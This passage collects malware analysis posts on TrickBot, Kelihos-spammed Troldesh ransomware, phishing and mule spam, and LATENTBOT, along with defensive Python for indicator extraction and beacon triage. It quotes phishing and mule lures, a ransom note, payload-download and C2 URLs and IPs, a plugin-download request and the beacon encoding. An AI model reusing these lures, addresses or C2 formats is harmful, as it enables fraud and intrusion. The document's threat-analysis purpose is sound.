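To: Grazielle <grazielle@example.invalid>
Subject: Two for one
Content-Type: text/plain; charset=utf-8

(body omitted)
"""

def parse_spam_headers(raw: bytes) -> Dict[str, object]:
    """Decode the headers an analyst keys on: subject, sender display name and domains."""
    msg = message_from_bytes(raw, policy=policy.default)
    # policy.default parses address headers and decodes RFC 2047 encoded-words in both
    # unstructured headers (Subject) and display names (From, Reply-To).
    from_hdr, reply_hdr = msg["From"], msg["Reply-To"]
    sender = from_hdr.addresses[0] if from_hdr is not None and from_hdr.addresses else None
    reply = reply_hdr.addresses[0] if reply_hdr is not None and reply_hdr.addresses else None
    from_domain = sender.domain.lower() if sender else ""
    reply_domain = reply.domain.lower() if reply else ""
    return {
        "subject": str(msg["Subject"] or ""),
        "from_name": sender.display_name if sender else "",
        "from_domain": from_domain,
        "reply_domain": reply_domain,
        # Brand spam relayed through bots usually keeps Reply-To on the spoofed brand's domain;
        # a mismatch is one of the cheap signals worth flagging.
        "reply_to_mismatch": bool(sender and reply and from_domain != reply_domain),
    }

def sender_domains(messages: List[bytes]) -> List[str]:
    """Unique sender domains across a capture, like the list that follows in the post."""
    return sorted({str(parse_spam_headers(m)["from_domain"]) for m in messages} - {""})
```

To apply this to a pcap, export the IMF objects from Wireshark (File > Export Objects > IMF) and pass each file's bytes to parse_spam_headers; the decoded subject is what you would search for in mail logs, since the raw encoded-word form will not match.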

The capture contained messages from all of the following domains:

aggadi.com.br
aol.com
belissimacosmeticos.com.br
catcorlando.com
citrosuco.com.br
connect.match.com
uspoloassn.com
newsletter.coastalscents.com
email.modait.com.br
facebookmail.com
id.apple.com
itmae.com.br
limecrimemakeup.com
offers.dominos.com
pcpitstopmail.com
photojojo.com
pof.com
sigmabeauty.com
submamails.com
twitter.com
walmart.com

Credential Exchange

TrickBot displays a characteristic similar to the Kelihos botnet, in the sense that it logs in to the mail server with stolen credentials before it starts to send spam. A massive number of stolen credentials were visible in plaintext as the botnet distributed them.

Fig. 10: Stolen Credentials reconstructed in Network Miner


With this analysis, it is safe to say that TrickBot is extremely tricky! Researchers at UAB are focused on uncovering more secrets of this malware. We will keep everyone posted with our new findings!

To sum up, TrickBot is not only targeting your BANKING credentials but also sending you SPAM.


NoMoreRansom aka Troldesh Ransomware Delivered by Kelihos

My favorite guest blogger Arsh Arora, a malware analyst and Ph.D. researcher at UAB, is back with new and interesting facts about Kelihos, a botnet family that he has been tracking for a year and a half and providing some great intel about to the community and law enforcement. Today, he noticed that it is delivering URLs leading to Troldesh ransomware. Take it from here, Arsh ...

Kelihos botnet delivering Troldesh Ransomware impersonating Bank of America

No_More_Ransom, aka Troldesh encryption ransomware, is being delivered by Kelihos in the form of embedded URLs within email messages. The delivery mechanism is similar to previous cases of ransomware spammed by Kelihos. In early July, Kelihos introduced itself to the world of ransomware by spamming links to Wildfire ransomware, followed by CryptFile2 ransomware in August. Then it shifted its focus towards banking trojans such as Panda Zeus, Nymaim and Kronos. Now it has come full circle and struck back with Troldesh encryption ransomware. The funny thing is that the ransomware encrypts files with the extension ".no_more_ransom". Moreover, the spammed URLs redirected to download either a JavaScript file or a Microsoft Word document. This is the first time that Kelihos has used JavaScript to infect users.

Another interesting observation was that this spam campaign was specifically geo-targeting Australian email addresses ending with ".au".  ".pl" email users were getting dating spam, while ".us" extension emails were being invited to sign up as Money Mules.  All other email TLDs were getting the traditional pharmaceutical spam.

NoMoreRansom aka Troldesh Ransomware

While doing the daily run of malware, one of my fellow researchers at UAB, Max Gannon, noticed a different behavior in the Kelihos botnet. It was sending embedded links using a credit-debt theme. Most importantly, some of the URLs redirected to download a .zip file containing a JavaScript file, while other links downloaded a Microsoft Word document. At the time of writing, most of the URLs were still live.

Subject: Please Settle Credit Arrears Shortly

Dear Client!

Our Credit Department has done research on your payment record for last year and learned that payments had not been made for last 3 months. We are now working on the issue pertaining to ways to help you with fulfilling liabilities and settling these arrears.

At the same time, we realize you may have had excellent reasons for such payment breakdown. That is exactly why we are contacting you now. Notwithstanding, if you are not proceeding your debt settlement, we will have to engage our enforcement units in commencing the law-suit case against you. This is the compulsory measure, so unfortunately, we may not help you.

Please process at least the very first payment at the earliest possible time. Else, charges may apply, and then the trial may be run.

We have made the full report of your situation. It contains the payment history, the total debt amount effective today, and further recommendations on arranging the issue. Please open and be guided with instructions as soon as possible.

The file can be found here: 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

Sincerely Yours,
Bank of America
Customer Relations Department
.

The following are the different subject lines that were spammed:
URLs that downloaded a .zip file containing JavaScript

Subject - Credit Department Discovered Your Debt - 
hxxp://eileenparker[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - Pay for Credit Debt when Possible - 
hxxp://thehousepartnership[dot]co[dot]uk/wp-content/themes/twentyten/redirect[dot]php

Subject - Please Settle Credit Arrears Shortly - 
hxxp://chris-smith-web[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - You Have a 3-Month Credit Debt - 
hxxp://infopro[dot]it/wp-content/themes/twentyeleven/redirect[dot]php

Fig. 1: Zip file downloaded with the embedded URL link

URLs that downloaded a Microsoft Word document

Subject - Please Settle Credit Arrears Shortly - 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - You Have a 3-Month Credit Debt - 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

URLs that were unreachable

Subject - Pay for Credit Debt when Possible - 
hxxp://starsounds[dot]net/wp-content/themes/twentyeleven/redirect[dot]php - Down
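The URLs in this post and in the TrickBot post above are defanged three different ways ([.], [dot] and hxxp), which makes feeding them into a blocklist or a search error-prone. The following added example (not from the UAB posts) normalises such tokens: it refangs only the tokens the author deliberately defanged, splits them into host and path, and groups URL hosts by path, which makes the reuse of /wp-content/themes/twentyten/redirect.php across unrelated WordPress sites visible at a glance. The sample text is constructed from lines on this page.

```python
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Markers used on this page to defang indicators: "[.]", "[dot]" and an "hxxp" scheme.
_DOT_MARKER = re.compile(r"\[\s*(?:\.|dot)\s*\]", re.IGNORECASE)
_DEFANGED_TOKEN = re.compile(r"\S*(?:\[\s*(?:\.|dot)\s*\]|hxxps?://)\S*", re.IGNORECASE)
_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample text made of defanged lines taken from this page.
SAMPLE_TEXT = """
hxxp://eileenparker[dot]com/wp-content/themes/twentyten/redirect[dot]php
hxxp://chris-smith-web[dot]com/wp-content/themes/twentyten/redirect[dot]php
hxxp://infopro[dot]it/wp-content/themes/twentyeleven/redirect[dot]php
hxxp://95[.]163[.]127[.]179/777[.]exe
http://martinagebhardt[.]hu/w/1gox[.]php
If you have any questions please contact us at: kia01915@aol[dot]com
adelaidebank[.]com[.]au
"""

def refang(token: str) -> str:
    """Undo the page's defanging: [.] / [dot] -> '.', hxxp:// -> http://."""
    token = _DOT_MARKER.sub(".", token)
    return re.sub(r"^hxxp(s?)://", r"http\1://", token, flags=re.IGNORECASE)

def defang(value: str) -> str:
    """Re-defang consistently for reports: http -> hxxp and every dot -> [.]."""
    value = re.sub(r"^http(s?)://", r"hxxp\1://", value, flags=re.IGNORECASE)
    return value.replace(".", "[.]")

def extract_iocs(text: str) -> List[Dict[str, object]]:
    """Pull out only the tokens the author defanged, so 'Setup.exe' or 'e.g.' never become indicators."""
    records: List[Dict[str, object]] = []
    for match in _DEFANGED_TOKEN.finditer(text):
        live = refang(match.group(0).strip("()<>\"'")).rstrip(".,;:")
        if "@" in live:
            records.append({"type": "email", "value": live,
                            "host": live.rsplit("@", 1)[1].lower(), "path": "", "host_is_ip": False})
            continue
        if "://" in live:
            parts = urlsplit(live)
            host, path = (parts.hostname or ""), parts.path
        else:
            host, _, rest = live.partition("/")
            path = "/" + rest if rest else ""
        host = host.lower()
        records.append({"type": "url" if path else "host", "value": live,
                        "host": host, "path": path, "host_is_ip": bool(_IPV4.match(host))})
    return records

def hosts_by_path(records: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Same path on unrelated hosts usually means one compromise kit or one redirector script."""
    grouped: Dict[str, List[str]] = {}
    for rec in records:
        if rec["path"]:
            grouped.setdefault(str(rec["path"]), []).append(str(rec["host"]))
    return {path: sorted(hosts) for path, hosts in grouped.items()}
```

Keying on the defang markers rather than on anything that looks like a domain is deliberate: it avoids turning file names such as Setup.exe into indicators, at the cost of missing hosts the author left in clear, which on this page are the spoofed brand domains rather than attacker infrastructure.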

JavaScript-based infection has not previously been associated with Kelihos, so this can be considered a noticeable change and a well-thought-out strategy by the bot operators.

Hashes (MD5) of the JavaScript and Word document are:

1d57eba1cb761b99ffcf6bc8e1273e9c  instructions.doc
711881576383fbfeaaf90b1d6c24fce0  instructions.js

On the other hand, embedded URLs leading to Microsoft Word documents have been seen before. The document behaves as in earlier campaigns: it asks the user to enable macros by clicking the "Enable Content" (in effect, "Encrypt Me") button. Once macros are enabled, it downloads a payload from the following link:

hxxp://95[.]163[.]127[.]179/777[.]exe
MD5 - 8441efe3901a0ec7f18c6ef5159877cc

Virus Total Link - 777.exe VT

After the file is downloaded, it encrypts the system with the Troldesh encryption ransomware and adds the "no_more_ransom" extension at the end of each file on the system. The ransom note on the desktop was displayed in Russian as well as English.

Fig. 2: Desktop screen after encryption

Fig. 3: Ransom Note found in text ReadMe.txt

All the important files on your computer were encrypted.
To decrypt the files you should send the following code:
xxxxxxxxxxxxxxxxxxxxx
to e-mail address 2Lynness.Taftfera1990@gmail[dot]com .
Then you will receive all necessary instructions.
All the attempts of decryption by yourself will result only in irrevocable loss of your data.
If you still want to try to decrypt them by yourself please make a backup at first because
the decryption will become impossible in case of any changes inside the files.
If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
use the feedback form. You can do it by two ways:
1) Download Tor Browser from here:
https://www.torproject.org/download/download-easy.html.en
Install it and type the following address into the address bar:
http://cryptsen7fo43rr6.onion/
Press Enter and then the page with feedback form will be loaded.
2) Go to the one of the following addresses in any browser:
http://cryptsen7fo43rr6.onion.to/
http://cryptsen7fo43rr6.onion.cab/

The above is a plain-text version of the ransom note. As can be seen, a Gmail address is being used as the contact, which is unusual behavior.

Troldesh does not stop trolling the victim there: it also downloads the Pony malware, which contacts its command and control server at this location:

 hxxp://ipieceofcake[dot]com/wp-content/uploads/2016/04/gate[dot]php

When I visited the link it was down, but thanks to our Malware expert Neera Desai who works for PhishMe and is pursuing her Masters in Computer Forensics at UAB, we were able to visit the panel page of the Pony malware.

Fig. 4: Pony malware panel page

This was really fascinating, as Kelihos spammed URLs for Troldesh encryption ransomware with redirects to a malicious Microsoft Word document and a zip file containing JavaScript. The payload encrypts the victim's files, but it also downloads the Pony malware to steal information from the victim's computer, a double blow to the victim.

Money Mule Spam 

The Kelihos botnet was not in a mood to stop. It also sent money mule spam geo-targeting users whose email addresses end in the United States ".us" ccTLD. It impersonated a company from 'China looking for employees'.

Text of the email is as follows:

Subject: China company is looking for employees

We are the greatest transport company in China involved in 
transportation of high-dimension goods across the globe. At present, 
we are aimed at expanding by opening offices across the globe for 
deliveries of small consignments. We are looking for employees to 
open offices and ensure services (deployment and supervision of 
packages). All costs for the office establishment are undertaken by 
the organization. During the first month of your job, you and our 
employees are to be engaged in searching for the storage structure. 
You will be also required to appoint some amount of orders to your 
home address (not more than 10kg parcels a day) in order to check 
them for flaws and ship forward with pre-paid labels. We have a 
certain flow of parcels to date, and the work is already jogging on; 
if you are ready to start your operation right away, we are ready to 
pay 2800$ a month. In due course your salary will increase up to 
3500$ if you agree to work in the future office.

You have the following options of working with us:
1. You are working at home for the first month, receiving packages 
and shipping them forward; starting looking for an office place in 
your town (all the instructions you will receive from our managers)
2. You continue to work from home and get 2900$ every month, plus 
bonuses for fast shipped package
3. If something doesn't fit you and you decide to stop the job with 
us, we will pay you monthly salary and be waiting for you again in 
our team in the future!

If you have any questions please contact us at: kia01915@aol[dot]com

All costs for establishment the office are taken by the company, 
shipping is made with prepaid labels, this job does not require any 
financial investment from you. You can also combine this work with 
another one if you decide to work in the office in the future.
The convenient control panel of a corporate website will help you to 
track parcels, bonuses you are to get for a shipped package, and your 
personal information for salary and further job instructions.

The company ensures the following advantages:
1. Health benefits
2. Paid vacations and sick leaves
3. Paid flight tickets, gasoline

This is a temporary offer, as soon as we have a team of employees in 
your staff the vacancy will be closed.

Please contact our HR manager for further details: kia01915@aol[dot]com
.
Other subject lines that were spammed in the same theme are mentioned below with their corresponding reply-to email address.

Subject - China company is looking for employees - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - bree10682@aol[dot]com

Subject - Job opportunity - marquerite23894@aol[dot]com
Subject - Open vacancy - marquerite23894@aol[dot]com

The other thing to note is that all of the reply-to addresses use AOL domains, which is itself a distinctive trait.


To conclude, Kelihos has been surprising researchers quite often, and it has become necessary to keep track of the botnet's different activities. The inclusion of ransomware adds interesting twists for both research and law enforcement. Another thing that I found while searching for NoMoreRansom was a group established by key leaders in the community to fight against the rise of ransomware. 

So is the extension of NoMoreRansom a challenge to the people fighting it? Who knows? 
FYI: Things are about to get interesting!

Kelihos Botnet sending geo-targeted Desjardins Phish to Canadians

As we mentioned in our blog last week (see: Kelihos botnet sending Panda Zeus to German and UK Banking Customers), the Kelihos botnet is now using "geo-targeting" based on the ccTLD portion of email addresses.  Today, those recipients whose email address ends in ".ca" are receiving a French language spam message advertising one of many Desjardins phishing websites:

[Images: French Desjardins phishing email and its Google Translate rendering]
Some of the email subjects being used include:

Subject:  Renouvellement de votre compte Desjardins
Subject:  Solutions en ligne Desjardins
Subject:  Veuillez regulariser votre compte Acces
Subject:  Desjardins Reactivation
Subject:  Reactivation de votre compte AccesD

Each of these URLs is currently resolving to the IP address 5.166.183.135:


Here is a pictorial walk-through of the phishing website:

We begin by entering a Credit Card number -- it must be a number that passes a Luhn check:


After entering a valid CC#, the next page asks the phishing victim for three security questions and their answers:


And lastly, the phishers try to get any and all possible additional information they can!

 
Only after entering a valid password and a number that matches the mathematical rules for a Canadian Social Insurance Number does the phisher send the victim to the real Desjardins website!

Beware, Canadian friends!   And let us hope that our shared victimization increases our mutual law enforcement agencies' desire to stop this botnet!



LATENTBOT: Trace Me If You Can

FireEye Labs recently uncovered LATENTBOT, a new, highly obfuscated BOT that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.

Through our Dynamic Threat Intelligence (DTI), we have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which we named LATENTBOT – caught our attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.

Some of the main features of LATENTBOT are listed below:

a)    Multiple layers of obfuscation
b)    Decrypted strings in memory are removed after being used
c)    Hiding applications in a different desktop
d)    MBR wiping ability
e)    Ransomlock similarities such as being able to lock the desktop
f)    Hidden VNC Connection
g)    Modular design, allowing easy updates on victim machines
h)    Stealth: Callback Traffic, APIs, Registry keys and any other indicators are decrypted dynamically
i)    Drops Pony malware as a module to act as infostealer

LATENTBOT Overview

Stealth being one of its traits, LATENTBOT will only keep malicious code in memory for the short time that is needed. Most of the encoded data is found either in the program resources or in the registry. A custom encryption algorithm is shared across the different components, including in encrypting its command and control (CnC) communications. Due to this, its family binaries are detected with a generic name such as Trojan.Generic:

https://www.virustotal.com/en/file/39af310076282129e6a38ec5bf784ff9305b5a1787446f01c06992b359a19c05/analysis/

LATENTBOT itself is not targeted in nature – it has been observed in multiple industries – but it is selective in the types of Windows systems it infects. For example, it won’t run in Windows Vista or Server 2008. LATENTBOT also uses compromised websites as CnC infrastructure, making infection easier and detection harder.

Based on passive DNS information and similar samples found in the wild, it is possible that LATENTBOT was created around mid-2013. Throughout the course of 2015, we observed multiple successful infection campaigns, as seen in Figure 1.

 

Figure 1: Targeted Countries and LATENTBOT CnC Locations

Infection Vector

The preliminary steps to infect victims with LATENTBOT already contain multiple layers of obfuscation, as described in Figure 2: Infection Phase.


 
Figure 2: Infection Phase

Step 1

Malicious emails containing an old Word exploit are created with the Microsoft Word Intruder[1] (MWI) builder and sent to the victims.

Step 2

When the attached Word document is opened, an embedded malicious executable runs, beaconing to the MWISTAT Server (see Figure 3) for two main purposes:

1.    Campaign tracking
2.    Second stage binary download


 
Figure 3: MWI Beacon
                    
During our analysis, the Word documents downloaded LuminosityLink as the second stage binary. LuminosityLink is a full-featured RAT that has the ability to steal passwords, record keystrokes, transfer files and activate attached microphones or webcams.

Step 3

Since LuminosityLink is a RAT that offers multiple capabilities to fully control the infected box, it is surprising that the RAT downloaded another payload from a secondary CnC at emenike[.]no-ip.info (180.74.89.183). This new module is LATENTBOT which offers new capabilities that will be detailed in this report.

Dissecting LATENTBOT

The analysis will concentrate on the third stage LATENTBOT binary lsmm.exe (af15076a22576f270af0111b93fe6e03) dropped in Step 3 above, but we are far from the final stage. Another similar binary that was part of our analysis is aya.exe (1dd0854a73288e833966fde139ffe385), which performs the same actions. Let’s take an in-depth look at this interesting piece of malware.

LATENTBOT is an obfuscated .NET binary, which contains an encoded resource object. This object is the fourth stage payload that is decoded using the algorithm seen in Figure 4.

 

Figure 4: XOR routine to decode embedded resource

The fourth stage payload is also a .NET binary, protected and obfuscated with ConfuserEx v0.5.0-10-g6ebeec5. The fourth stage binary will open the .NET programs RegAsm.exe and CvTres.exe from %windir%\Microsoft .Net\Framework\v2.050727\ and use process hollowing to replace them with malicious code in memory.

The CvTres.exe process is replaced with a Visual Basic UPX-packed binary extracted from the binary’s resources, as seen in Figure 5.

 
Figure 5: Process hollowing to replace the contents of CvTres.exe in memory

The binary creates a registry key for persistence with the hardcoded binary name dlrznz68mkaa.exe (a copy of the original aya.exe) at the location shown in Figure 6:

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load

 

Figure 6: LATENTBOT persistence

The folder aFwLiiV and filename dlrznz68mkaa.exe are hardcoded in the resources section of the Confuser .NET binaries. Figure 7 shows the resources content from aya_decrypted.exe.



 
Figure 7: Confuser .NET resources showing malicious directory and file name

RegAsm.exe will be replaced in memory with a shellcode loader that opens %windir%\system32\svchost.exe and uses the same process hollowing technique to load a second shellcode loader that eventually will decode and execute a fifth stage Delphi binary in memory.

At this point, let’s see the new stages discovered in Figure 8:

 

Figure 8: The many stages of LATENTBOT

Figure 9 shows a quick view of one of the decoder functions inside the second shellcode loader that eventually decrypts the fifth stage Delphi Binary:

 

Figure 9: Complex decoder function

Fifth Stage Delphi Binary

This is another launcher that uses the same process hollowing technique we saw previously to execute the sixth stage binary in another instance of svchost.exe. This new binary is encoded in the resources section and decoded at runtime with the function from Figure 10.


 
Figure 10: Decoder for sixth stage binary

The process tree at this point with aya.exe, RegAsm.exe and the two instances of svchost.exe can be seen using the Process Explorer tool in Figure 11, with the sixth stage being suspended:



 
Figure 11: Multiple Injections View

Sixth Stage Delphi Binary

The sixth stage is highly obfuscated; multiple encoded strings can be seen which represent API function names, CnC IP, POST/GET parameters, HTTP headers, process names, and so on, all of which are decrypted at runtime.  

First, the malware performs several validations. If the Windows OS version is 6.0 (Windows Vista, Windows Server 2008), or if the malware’s parent process is not svchost.exe or explorer.exe (see Figure 12), then it will exit.

Running Out of Battery?

If LATENTBOT is running on a laptop, it will query the battery status via GetSystemPowerStatus and, if the battery is Low or Critical, it will call SetThreadExecutionState to try to prevent the system from sleeping or turning the display off.


 
Figure 12: Processes names decrypted to be validated

Is the BOT_Engine plugin installed?

Now LATENTBOT will check if its plugins are already downloaded by querying the registry key below, which should contain subkeys with the encrypted modules:

HKCU\Software\Google\Update\network\secure

If plugins are found, LATENTBOT will proceed to load BOT_ENGINE, which is the main module (described in more detail below). Otherwise, it will download the required plugins from a CnC server as explained in the next section.

Data Exfiltration

If the plugins were not found, LATENTBOT will proceed to download them, but it will first validate that the connection to the CnC server is alive by making the HTTP request shown in Figure 13:

 
Figure 13:  LATENTBOT initial beacon

LATENTBOT then verifies that the HTTP response is one of the following:

•    200: The requested resource was found
•    302: Found but in a different URI (Redirection)
•    307: Similar to 302

If none of the valid HTTP responses shown above are received, it will retry the connection every 20 seconds indefinitely.

Assuming a valid HTTP response was received, LATENTBOT will proceed to generate a beacon. First, the URI is generated based on information from the infected host; two examples are shown below:

forum?datael=US-20-503634784811&ver=4006&os=2&acs=0&x64=0&gr=load-1.7.1.20&random=wopvrudsks

forum?datael=US-70-347126827175&ver=4006&os=5&acs=0&x64=0&gr=load-1.7.1.20&random=dbvcwhctdn

Where:
•    All the GET parameters are decoded at runtime. For example, tgsz0D decodes to &gr.
•    datael: <locale>-<OS_Version>-<random_number>, where <OS_Version> is one of the following:
    o    10 = Windows 2000 (5.0)
    o    20 = Windows XP (5.1)
    o    30 = Windows XP 64-Bit, Windows Server 2003/R (5.2)
    o    40 = Windows Vista, Windows 2008 (6.0)
    o    70 = Windows 7, Windows Server 2008 R2 (6.1)
    o    80 = Windows 8, Windows Server 2012
    o    90 = Windows 8.1, Windows Server 2012 R2
•    random and the <random_number> used by datael are set dynamically. For random, 10 characters are randomly selected from the buffer abcdefghijklmnopqrstuvxyz. datael randomly selects 12 integers from the buffer 0123456789012345678912345678. The seed is initialized with the Delphi function Randomize() and the Delphi Random() function is called on each loop iteration, making the callback different on each request.
    o    Note: The <random_number> is stored in the following registry key (created at runtime): \HKCU\Software\Adobe\Adobe Acrobat\data
•    os: Windows OS Major version, using the same codes as OS_Version above.
•    acs: possible values are 1 or 0. 1 is used if the malware is running under SYSTEM privileges.
•    x64: flag identifying the OS architecture.
•    The ver and gr parameter values are hardcoded.

Then the URI is encoded using a three-step algorithm. Each step is described below:

Step 1: Custom substitution routine

This routine substitutes valid URI characters using custom hardcoded lookup tables; different tables are used for encoding and for decoding. Figure 14 shows the lookup table used during the decoding phase:
 
                  
Figure 14:  Decoding lookup table

This routine encodes/decodes one WORD at a time. Each byte is shifted right or left (depending on whether it is encoding or decoding) by a value that depends on the byte position, as shown in Table 1:

Table 1: Shift values

The result is added after each shift, as shown in Figure 15.


Figure 15: Shift calculations
Note: For encoding, depending on a parameter, the substitution routine can choose from three different lookup tables; for this sample, only one lookup table was used every time.

Step 2: XOR Modifier

The substituted data is passed to the XOR modifier shown in Figure 16.



Figure 16: XOR Modifier routine

Different XOR modifiers are used as shown in Table 2:


Table 2: XOR modifier

The same XOR modifier algorithm has been used by iBanking/TauSpy Android malware[2].

Step 3: Base64 encoding

The resulting encoded URI is then base64 encoded.

The whole algorithm can be expressed as follows:

Encryption:
  encoded_uri = base64_encode(substitute(xor_modifier(modifier, plain_text_uri)))

Decryption:
  plain_text_uri = xor_modifier(modifier, substitute(base64_decode(encoded_uri)))

By applying the substitution and XOR algorithms described above to the original URI:

forum?datael=US-20-503634784811&ver=4006&os=2&acs=&x64=0&gr=load-1.7.1.20&random=wopvrudsks

we get the following encoded URI:

Adl7k+v9qQGCaZti0LS9v++uFb6axeFE2twthNT9s3K6/oG0xjQS2Gqk+Udja91kch3nwphGANCtdr83tXSAaLJEi/qmG3xmKKPwR8lFncN9i93yfHRxFQ2EBC

This URI is transformed with standard Base64 encoding, resulting in:

QWRsN2srdjlxUUdDYVp0aTBMUzl2Kyt1RmI2YXhlRkUydHd0aE5UOXMzSzYvb0cweGpRUzJHcWsrVWRqYTkxa2NoM253cGhHQU5DdGRyODN0WFNBYUxKRWkvcW1HM3htS0tQd1I4bEZuY045aTkzeWZIUnhGUTJFQkM=

Which finally is used to send the beacon shown in Figure 17:

Figure 17: Fully encoded LATENTBOT beacon

The CnC replies with:
MDVvWVc2K3J5ZGV4ZlNyM0lycjQ5TFhkSnBmZWJTbms1Zkx0aEQzNWxqaFlqVS9XczN4MTNqV1RQOWtHWUF1ZERidzdkR0ZOdjI1UHAzT1pYcktBM2l5OGlWU04zMjByZDExOFNVREdObDk3QjdPNWtQUjhBU05jcjVybXR1Mkg=

The decoded URI yields:

mod:http://46.165.246.234/m/:Bot_Engine-A35CB08FB078051B27894BCD380EAC43-229376-018701-881384-8;

This is the name of a module (Bot_Engine) together with a unique ID, to be downloaded later during execution.
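The beacon format described above and the standard-Base64 outer layer from Step 3 can be handled with a short script. The following is an added example, not FireEye's code: it annotates the plaintext beacons quoted in this report and strips the outer Base64 from the wrapped form back to the substituted/XOR'd inner string; the custom substitution tables and XOR modifiers from Figures 14 and 16 are not reproduced, so the inner layer is returned as-is. The sample URIs are the ones quoted in this report.

```python
"""Annotate LATENTBOT-style beacon URIs (added example, not FireEye's code)."""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# OS codes carried in the datael/data parameter, as listed in the report.
OS_CODES = {
    "10": "Windows 2000 (5.0)",
    "20": "Windows XP (5.1)",
    "30": "Windows XP 64-bit / Windows Server 2003 (5.2)",
    "40": "Windows Vista / Windows Server 2008 (6.0)",
    "70": "Windows 7 / Windows Server 2008 R2 (6.1)",
    "80": "Windows 8 / Windows Server 2012",
    "90": "Windows 8.1 / Windows Server 2012 R2",
}

# A single standard-Base64 token: the shape of the outer layer (Step 3).
_B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed test set: the URIs quoted in the report.
LOADER_BEACON = ("forum?datael=US-20-503634784811&ver=4006&os=2&acs=0&x64=0"
                 "&gr=load-1.7.1.20&random=wopvrudsks")
ENGINE_BEACON = ("forum?data=US-20-164346373561&ver=4006&os=2&av=19&acs=&x64=0"
                 "&gr=engine-1.7.1.20-s&li=load-1.7.1.20&plugins=Bot_Engine-881384-8"
                 "&errcode=0&bk=0&note=0&dom=1&sockslog=0&vidtype=0&random=deabaotabf")
INNER_ENCODED_URI = ("Adl7k+v9qQGCaZti0LS9v++uFb6axeFE2twthNT9s3K6/oG0xjQS2Gqk+Udja91kch3n"
                     "wphGANCtdr83tXSAaLJEi/qmG3xmKKPwR8lFncN9i93yfHRxFQ2EBC")
WRAPPED_BEACON = ("QWRsN2srdjlxUUdDYVp0aTBMUzl2Kyt1RmI2YXhlRkUydHd0aE5UOXMzSzYvb0cweGpRUzJH"
                  "cWsrVWRqYTkxa2NoM253cGhHQU5DdGRyODN0WFNBYUxKRWkvcW1HM3htS0tQd1I4bEZuY045"
                  "aTkzeWZIUnhGUTJFQkM=")
CNC_REPLY = ("MDVvWVc2K3J5ZGV4ZlNyM0lycjQ5TFhkSnBmZWJTbms1Zkx0aEQzNWxqaFlqVS9XczN4MTNq"
             "V1RQOWtHWUF1ZERidzdkR0ZOdjI1UHAzT1pYcktBM2l5OGlWU04zMjByZDExOFNVREdObDk3"
             "QjdPNWtQUjhBU05jcjVybXR1Mkg=")


def unwrap_outer_base64(uri):
    """Remove the standard-Base64 outer layer (Step 3 of the encoding).

    Returns the inner string when `uri` is one Base64 token that decodes to
    printable ASCII, else None. The result is still covered by the custom
    substitution and XOR steps, whose tables are not reproduced here.
    """
    token = uri.strip().lstrip("/")
    if not _B64_TOKEN.match(token):
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or any(b < 0x20 or b > 0x7E for b in raw):
        return None
    return raw.decode("ascii")


def parse_host_id(value):
    """Split <locale>-<OS_code>-<random_number> (datael / data parameter)."""
    m = re.fullmatch(r"([A-Z]{2})-(\d{2})-(\d{12})", value)
    if not m:
        return None
    locale, os_code, random_number = m.groups()
    return {
        "locale": locale,
        "os_code": os_code,
        "os_name": OS_CODES.get(os_code, "unknown code"),
        # the report notes this value is also written under HKCU\Software\Adobe\Adobe Acrobat\data
        "random_number": random_number,
    }


def parse_beacon(uri):
    """Annotate a plaintext beacon; returns None if it does not fit the format.

    Accepts both the loader beacon (datael=...) and the post-install
    BOT_ENGINE beacon (data=..., av=..., plugins=...).
    """
    parts = urlsplit("/" + uri.lstrip("/"))
    if parts.path != "/forum":
        return None
    # keep_blank_values: the report shows 'acs=' sent with an empty value
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    host_id = query.get("datael") or query.get("data")
    if host_id is None:
        return None
    info = parse_host_id(host_id)
    if info is None:
        return None
    plugins = query.get("plugins", "")
    info.update({
        "stage": "loader" if "datael" in query else "engine",
        "ver": query.get("ver"),
        "gr": query.get("gr"),
        "runs_as_system": query.get("acs") == "1",
        "x64": query.get("x64") == "1",
        "av_id": query.get("av"),
        "plugins": plugins.split(",") if plugins else [],
        "random": query.get("random"),
    })
    return info


def triage(uri):
    """Classify an observed request URI by LATENTBOT-like shape."""
    if parse_beacon(uri) is not None:
        return "plaintext-beacon"
    inner = unwrap_outer_base64(uri)
    if inner is not None and len(inner) >= 16 and _B64_TOKEN.match(inner):
        return "wrapped-beacon"
    return "unrecognised"


if __name__ == "__main__":
    for label, uri in [("loader", LOADER_BEACON), ("engine", ENGINE_BEACON),
                       ("wrapped", WRAPPED_BEACON), ("cnc reply", CNC_REPLY)]:
        print(f"{label}: {triage(uri)}")
        print("   ", parse_beacon(uri) or unwrap_outer_base64(uri))
```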

Downloading the Plugins

At this point, LATENTBOT is ready to start downloading the different plugins by sending the beacon shown in Figure 18:

GET /m/484588.zip HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 37.220.9.229
Cache-Control: no-cache


Figure 18: LATENTBOT download beacon

The module names pretend to be ZIP files, but they are in fact encoded data that is saved into the registry key secure, as shown in Figure 19.


Figure 19: Registry keys storing the malicious plugins

Decrypting the plugin names using the XOR modifier algorithm from Figure 16 with modifier 0x2328 gives the following module names:
1.    hdtWD3zyxMpSQB = Bot_Engine
